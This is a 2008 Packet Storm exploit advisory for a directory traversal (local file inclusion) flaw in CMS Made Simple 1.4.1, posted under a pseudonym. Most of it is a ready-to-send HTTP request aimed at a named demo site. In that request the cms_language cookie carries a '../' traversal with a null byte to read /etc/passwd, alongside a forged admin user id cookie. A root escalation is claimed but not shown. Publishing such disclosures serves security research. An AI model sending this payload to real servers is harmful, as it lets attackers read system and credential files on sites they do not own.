cmsmadesimple-lfi.txt

2008-11-30T00:00:00
ID PACKETSTORM:72435
Type packetstorm
Reporter M4ck-h@cK
Modified 2008-11-30T00:00:00

Description

                                        
                                            `Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation  
Vendor: CMS Made Simple  
Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)  
Author: M4ck-h@cK  
Date 29.11.2008  
Home: sweet home  
contact: no, thx :)  
  
Exploit:  
  
  
Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]  
  
GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0  
Accept: */*  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)  
Host: demo.cmsmadesimple.fr  
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1  
Connection: Close  
Pragma: no-cache  
  
It's possible to set "cms_language" value in order to view /etc/passwd file.  
  
  
`